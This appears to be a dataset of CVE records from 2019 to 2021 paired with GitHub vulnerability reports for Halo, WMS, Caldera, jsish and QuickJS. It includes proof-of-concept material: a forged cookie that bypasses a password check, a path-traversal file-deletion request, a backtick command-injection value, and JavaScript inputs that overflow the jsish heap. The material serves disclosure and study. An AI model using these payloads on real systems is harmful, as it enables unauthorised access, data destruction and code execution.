cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-19037
2021-07-12T17:15:08.713
Incorrect Access Control vulnearbility in Halo 0.4.3, which allows a malicious user to bypass encrption to view encrpted articles via cookies.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/135" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "26D31740-00EC-4BF2-99BA-364F0A87F8CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/halo-dev/halo/issues/135
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **我确定我已经查看了** (标注`[ ]`为`[x]`) - [x] [Halo 使用文档](https://docs.halo.run/) - [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [其他 Issues](https://github.com/ruibaby/halo/issues) ---- **我要申请** (标注`[ ]`为`[x]`) - [x] BUG 反馈 - [ ] 添加新的特性或者功能 - [ ] 请求技术支持 ---- The password accessing the article is flawed. The code only verifies the "halo-post-password-" + post.getPostId() in the cookie, but it does not verify that the password is correct. ``` //判断文章是否有加密 if (StrUtil.isNotEmpty(post.getPostPassword())) { Cookie cookie = ServletUtil.getCookie(request, "halo-post-password-" + post.getPostId()); if (null == cookie) { post.setPostSummary("该文章为加密文章"); post.setPostContent("<form id=\"postPasswordForm\" method=\"post\" action=\"/archives/verifyPostPassword\"><p>该文章为加密文章,输入正确的密码即可访问。</p><input type=\"hidden\" id=\"postId\" name=\"postId\" value=\"" + post.getPostId() + "\"> <input type=\"password\" id=\"postPassword\" name=\"postPassword\"> <input type=\"submit\" id=\"passwordSubmit\" value=\"提交\"></form>"); } } model.addAttribute("post", post); return this.render("post"); } ``` Send the postId to the server by entering the wrong password, and then add the cookie "halo-post-password-4027 (current article id) = 96e79218965eb72c92a549dd5a330112 (any md5 encrypted string)" to access the encrypted article content. ``` HTTP/1.1 302 Found Server: nginx/1.15.8 Date: Thu, 04 Apr 2019 15:02:04 GMT Content-Length: 0 Connection: close Location: https://demo.halo.run/archives/1554388726735 Content-Language: zh-CN Set-Cookie: halo-post-password-4032=96e79218965eb72c92a549dd5a330112 Strict-Transport-Security: max-age=31536000 ``` ![image](https://user-images.githubusercontent.com/19370924/55566348-1392a300-572e-11e9-8e38-9fe23ae70a0d.png) The vulnerability discoverer by Chaitin Tech.
Bypass password access to encrypted articles
https://api.github.com/repos/halo-dev/halo/issues/135/comments
3
2019-04-04T15:13:08Z
2021-07-15T08:18:57Z
https://github.com/halo-dev/halo/issues/135
429,335,886
135
2,173
CVE-2020-19038
2021-07-12T17:15:08.743
File Deletion vulnerability in Halo 0.4.3 via delBackup.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/23.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:0.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "26D31740-00EC-4BF2-99BA-364F0A87F8CA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/halo-dev/halo/issues/136
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
<!-- 如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。 提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way --> **我确定我已经查看了** (标注`[ ]`为`[x]`) - [x] [Halo 使用文档](https://docs.halo.run/) - [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98) - [x] [其他 Issues](https://github.com/ruibaby/halo/issues) ---- **我要申请** (标注`[ ]`为`[x]`) - [x] BUG 反馈 - [ ] 添加新的特性或者功能 - [x] 请求技术支持 ---- There is an arbitrary file deletion vulnerability in the backup file deletion. ``` @GetMapping(value = "delBackup") @ResponseBody public JsonResult delBackup(@RequestParam("fileName") String fileName, @RequestParam("type") String type) { final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName; try { FileUtil.del(srcPath); return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-success")); } catch (Exception e) { return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.delete-failed")); } } ``` eg. ``` GET /admin/backup/delBackup?type=posts&fileName=../../upload/2019/3/veer-15238236420190404102850332.jpg HTTP/1.1 Host: demo.halo.run Connection: close Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Referer: https://demo.halo.run/admin/backup?type=posts Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=jLIF44HA_8IHwVFhq66-jAArsdL3Mtz_tg2GvNhO ``` ![image](https://user-images.githubusercontent.com/19370924/55575698-1dbe9c80-5742-11e9-928b-cf3b54da3829.png) The vulnerability discoverer by Chaitin Tech.
Any file deletion in the background
https://api.github.com/repos/halo-dev/halo/issues/136/comments
2
2019-04-04T17:29:24Z
2021-07-15T08:17:49Z
https://github.com/halo-dev/halo/issues/136
429,398,035
136
2,174
CVE-2020-23079
2021-07-12T17:15:08.777
SSRF vulnerability in Halo <=1.3.2 exists in the SMTP configuration, which can detect the server intranet.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/806" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/halo-dev/halo/issues/806" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:halo:halo:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C3E9718-5360-45C9-B592-A3190A6409FC", "versionEndExcluding": null, "versionEndIncluding": "1.3.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/halo-dev/halo/issues/806
[ "Exploit", "Third Party Advisory" ]
github.com
[ "halo-dev", "halo" ]
1、Because the password of the login account of the system background is transmitted in plain text, it can easily enter the background through brute force cracking: 2、The problem lies in the STMP server configuration,which can specify host address and port ![image](https://user-images.githubusercontent.com/22486282/80572842-85244a00-8a31-11ea-97d1-114dc29492b6.png) 3、There is a hidden testConnection () interface in the code to test the connectivity of the mailbox server ![image](https://user-images.githubusercontent.com/22486282/80573022-d3394d80-8a31-11ea-8659-de5485422abd.png) 4、It is a javaMailSender that depends on springframework: ![image](https://user-images.githubusercontent.com/22486282/80573189-1abfd980-8a32-11ea-8b88-1ba36bcf862e.png) 5、So you can test through this interface, write the address as 127.0.0.1,When the server port is open, the corresponding time is shorter:20millis: ![image](https://user-images.githubusercontent.com/22486282/80573371-696d7380-8a32-11ea-9d3d-11318930a8e8.png) 6、The port is not open, the corresponding time is longer:1000+millis: ![image](https://user-images.githubusercontent.com/22486282/80573634-e00a7100-8a32-11ea-9170-86658130cd98.png) 7、You can obtain the open ports of the server and other hosts on the intranet in batches according to the length of the echo time, and then carry out further attacks
SSRF vulnerability exists at the SMTP configuration, which can detect the server intranet
https://api.github.com/repos/halo-dev/halo/issues/806/comments
0
2020-04-29T08:03:08Z
2020-07-17T08:18:30Z
https://github.com/halo-dev/halo/issues/806
608,857,881
806
2,175
CVE-2020-18544
2021-07-12T20:15:08.427
SQL Injection in WMS v1.0 allows remote attackers to execute arbitrary code via the "username" parameter in the component "chkuser.php".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/FeMiner/wms/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/FeMiner/wms/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wms_project:wms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C3D7900A-DA2E-4760-A23C-FD2A3570E65B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/FeMiner/wms/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "FeMiner", "wms" ]
A critical SQL Injection vulnerability was found in chkuser.php. The parameter "username" is passed without filtering to SQL sentence which causes the vulnerability. Hackers can exploit it without authority to get access to your database ![uc 20190307211653](https://user-images.githubusercontent.com/48321557/53959436-9a982f80-411e-11e9-897e-ef7da93fd98c.png)
SQL Injection vulnerability in chkuser.php!!!
https://api.github.com/repos/FeMiner/wms/issues/5/comments
0
2019-03-07T13:19:28Z
2019-03-07T13:19:28Z
https://github.com/FeMiner/wms/issues/5
418,304,747
5
2,176
CVE-2020-19907
2021-07-12T20:15:08.513
A command injection vulnerability in the sandcat plugin of Caldera 2.3.1 and earlier allows authenticated attackers to execute any command or service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/462" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mitre/caldera/issues/462" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*", "matchCriteriaId": "2062024F-1E59-4E84-8EA0-9F211A79A08F", "versionEndExcluding": null, "versionEndIncluding": "2.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/mitre/caldera/issues/462
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mitre", "caldera" ]
login the caldera open the url http://127.0.0.1:8888/plugin/sandcat/gui Enter a url, click clone button ``` `touch /tmp/pwn` ``` ![image](https://user-images.githubusercontent.com/9052484/64106984-f41aa780-cdab-11e9-81d5-2d0e0478d9c4.png) ![image](https://user-images.githubusercontent.com/9052484/64106913-c59ccc80-cdab-11e9-9af9-5547d04f98fc.png)
OS Command Injection in sandcat plugin
https://api.github.com/repos/mitre/caldera/issues/462/comments
2
2019-09-02T10:03:53Z
2019-09-20T18:24:07Z
https://github.com/mitre/caldera/issues/462
488,108,983
462
2,177
CVE-2020-22874
2021-07-13T15:15:08.457
Integer overflow vulnerability in function Jsi_ObjArraySizer in jsish before 3.0.8, allows remote attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/commit/858da537bde4de9d8c92466d5a866505310bc328" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/commit/858da537bde4de9d8c92466d5a866505310bc328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7B5CBE8-C60A-451B-88C5-630F33C398CE", "versionEndExcluding": "3.0.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/pcmacdon/jsish/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: ./configure && make test command: ./jsish poc1 ``` # poc: ``` var o = [ 1, 2 ]; o.length = -9007199254740991; o, 90040991; var ExBs = new RegExp('>l1Pq4Q~R$!'); ExBs = o.reverse(); var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o); o.length = o.length != o; o = zaCp.toExponential(o.length); var FfYD = new RegExp('@OsH'); JSON.stringify('/Z-s#YisGL'); o = o.constructor(); FfYD.lastIndex = -1 <= -2147483647; o.length = 1e+81 == FfYD.lastIndex; var yfSi = new Map([ [ 1, 1200, o.length, ExBs.lastIndex ], [ o, ExBs, o, 0, -Infinity, -Infinity ] ]); var Hjwz = new Map([ [], [ o, o, -1 ] ]); var QkwQ = new RegExp('GBY'); var dPft = new Map([ [ -2147483648, FfYD.lastIndex, FfYD, 3037000498, 0.1, ExBs.length, FfYD, 2147483649 ], [ ExBs, FfYD.lastIndex, -9007199254740994 ] ]); var fjNQ = o.indexOf(0.2, function () { }); var a = Object.keys(o); var TdaH = new RegExp('#0CHy=U2|.xg^{;xO'); var APSB = -9007199254740990 != a.length; var BYaK = new Float32Array([ yfSi, 4, -4294967295, FfYD, zaCp ]); var wCMe = new WeakSet([]); ``` # vulnerability description: ![image](https://user-images.githubusercontent.com/13704697/79126477-9420c080-7dd2-11ea-9f18-9d8ee33772bc.png) In src/jsiObj.c:428, `len` is the length of the Array, and the PoC is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425. ![image](https://user-images.githubusercontent.com/13704697/79126462-8d924900-7dd2-11ea-93ab-89254ffcc501.png) `obj-> arr` will get a smaller size of heap space, and then memset assigns a value to the space pointed to by `obj-> arr + obj-> arrMaxSize`, but this time has exceeded the actual heap range of ` obj-> arr`, causing heap overflow .
integer overflow and buffer overflow
https://api.github.com/repos/pcmacdon/jsish/issues/5/comments
1
2020-04-13T14:03:30Z
2020-04-14T00:10:53Z
https://github.com/pcmacdon/jsish/issues/5
598,907,622
5
2,178
CVE-2020-22875
2021-07-13T15:15:08.490
Integer overflow vulnerability in function Jsi_ObjSetLength in jsish before 3.0.6, allows remote attackers to execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/commit/5408a6d93f45bf1f7acd9ae5d44e0ebd77379e98" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/commit/5408a6d93f45bf1f7acd9ae5d44e0ebd77379e98" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*", "matchCriteriaId": "7D5295FF-C964-46BF-97CD-53B7C71C9B5E", "versionEndExcluding": "3.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/pcmacdon/jsish/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: ./configure && make test command: ./jsish poc1 ``` # poc: ``` var o = [ 1, 2 ]; o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308); o = o.toString(o.length); var a = Object.keys(o); var YzNz = new RegExp('kf}(Vq)XW8St'); o.length = -o.length; o.length = 5e-324 >= 9007199254740992; o.length = o == 1.3; a.length = -9007199254740990; o.length = a.length > o; var FpXa = new RegExp('\fÇ\xAF\x8F\x93A\xAFuQ=ºC\x99e\xACCýæÜ47\x18'); var APSB = -9007199254740990 != a.length; APSB = a.slice(a.length, a.length); var ZDnB = a.map(function () { }, function () { }); ``` The vulnerability code is in line src / jsiArray.c + 414, the function `jsi_ArrayMapCmd`, the vulnerability code is as follows: ![image](https://user-images.githubusercontent.com/13704697/79127884-33df4e00-7dd5-11ea-8343-b659d36551d7.png) The `curlen` here is also the size of the array, and can be arbitrarily set in the js code, for example in the poc ![image](https://user-images.githubusercontent.com/13704697/79127909-3d68b600-7dd5-11ea-8556-8298dbd00f35.png) The affected code is in the analytic function `Jsi_ObjSetLength`, as shown in the figure: ![image](https://user-images.githubusercontent.com/13704697/79127929-46598780-7dd5-11ea-9f14-a42e68ec43ef.png) The actual array size len is larger than `obj-> arrMaxSize`, which triggers the assert.
integer overflow
https://api.github.com/repos/pcmacdon/jsish/issues/10/comments
1
2020-04-13T14:23:26Z
2020-04-13T18:13:09Z
https://github.com/pcmacdon/jsish/issues/10
598,918,538
10
2,179
CVE-2020-22876
2021-07-13T15:15:08.523
Buffer Overflow vulnerability in quickjs.c in QuickJS, allows remote attackers to cause denial of service. This issue is resolved in the 2020-07-05 release.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ldarren/QuickJS/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ldarren/QuickJS/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:quickjs_project:quickjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "ACBECE86-357E-4B3A-8C1D-5642C1446D6B", "versionEndExcluding": "2020-07-05", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/ldarren/QuickJS/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ldarren", "QuickJS" ]
